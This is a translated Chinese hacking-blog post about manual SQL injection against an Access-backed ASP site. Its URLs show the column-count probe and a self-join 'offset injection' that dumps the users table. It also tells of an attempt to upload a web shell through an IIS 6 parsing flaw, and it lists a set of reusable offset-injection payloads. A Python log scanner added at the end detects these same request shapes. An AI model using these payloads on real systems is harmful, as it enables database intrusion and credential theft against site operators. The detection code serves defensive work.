About Access SQL offset injection

2010, August 17, 4:46 PM. Category: 黑友网文
Submitted by admin

Source: http://www.f4le.com/post-37.html

I had nothing to do these past two days, so I idly practised manual injection. I picked a random URL, entered a single quote (') and it threw an error! Then with an "and" test I found an injection point. Next I determined the database type, which of course was Access, and then worked out that there are fourteen columns:

http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users

[screenshot]

Then, following the usual approach, I started trying to dump the username and password columns, but none of that worked. Then I tried brute-forcing, still without luck. Then I searched Baidu for injection statements and found offset injection. I tried it, but without success, so I asked for help in the group; my thanks here to 丶反方向的钟!

He was also using offset injection. When he sent me his statement I realised that my injection statement was written wrong, or rather that I was just mechanically following the old routine. Using his statement I successfully obtained the username and password:

http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20on%20a.id=b.id )

[screenshot]

I found the backend login, but its functionality was too simple, as shown in the figure:

[screenshot]

But the ewe editor showed that it was hxcms 7.5 free edition, with keep-original-filename and remote upload options, so I was secretly pleased: an IIS 6 server with the parsing vulnerability. Uploading an image, I found it still got renamed; then I tested the remote-upload 0day, but that only takes the extension from the file name and then renames it too. Frustrating! So it really was not possible to get a shell. Then I wanted to download the 7.5 source to look at, but I could not find the source of the 7.5 free edition online, so I had to give up.

What I mainly learned here is the statement form used for offset injection, so I have summarised it briefly. The point of the trick is that "select *" over a table joined to itself on its key returns every column of both copies, so the column count of the union can be padded with literals (1, 2, 3, ...) until it matches the original query's fourteen columns, without having to know any column names.

The general form of the statements is as follows:

and 1=2 union select * from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )

and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )

and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id

and so on.

PS: apply it flexibly!!!
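As an added, defender-side example (not code from the original post): a small Python scanner that normalizes request query strings and flags the two request shapes the post relies on, the column-count probe ("union select 1,2,...,14 from ...") and the self-join offset injection ("union select ... * from (x as a inner join x as b on a.id=b.id)"), over constructed IIS-style log lines. The log field layout and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in a simplified IIS W3C layout:
# date time method cs-uri-stem cs-uri-query sc-status
# The query strings are the shapes discussed in the post; everything else is made up.
SAMPLE_LOG_LINES = [
    "2010-08-17 08:46:01 GET /show_new.asp bh=397 200",
    "2010-08-17 08:46:09 GET /show_new.asp bh=397%20and%201=2%20union%20select%20"
    "1,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users 500",
    "2010-08-17 08:47:30 GET /show_new.asp bh=394%20and%201=2%20union%20select%20*%20from%20"
    "(users%20as%20a%20inner%20join%20users%20as%20b%20on%20a.id=b.id%20) 200",
    "2010-08-17 08:48:02 GET /show_new.asp bh=400 200",
]

def normalize(query: str) -> str:
    """Percent-decode twice (defeats single and double encoding), lowercase, and
    collapse whitespace so the signatures see one canonical form."""
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", text).lower()

SIGNATURES = {
    # A run of integer literals used to find the column count of the original query.
    "column-count probe": re.compile(r"\bunion\s+select\s+(?:\d+\s*,\s*)+\d+\s+from\b"),
    # "select ... * from (t as a inner join t as b on a.k=b.k)": the offset-injection form.
    "offset injection (self-join)": re.compile(
        r"\bunion\s+select\b.*\*.*\bfrom\s*\(.*\binner\s+join\b.*\bon\s+\w+\.\w+\s*=\s*\w+\.\w+"
    ),
}

def classify(query: str):
    """Return the names of all signatures matching one raw query string."""
    norm = normalize(query)
    return [name for name, pat in SIGNATURES.items() if pat.search(norm)]

def scan(lines):
    """Return (line index, uri-stem, matched signatures) for every suspicious line."""
    findings = []
    for idx, line in enumerate(lines):
        fields = line.split(" ")
        if len(fields) < 6:
            continue  # not in the assumed field layout, skip it
        hits = classify(fields[4])
        if hits:
            findings.append((idx, fields[3], hits))
    return findings

if __name__ == "__main__":
    for idx, stem, hits in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {stem} -> {', '.join(hits)}")
```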

Tags: offset, injection
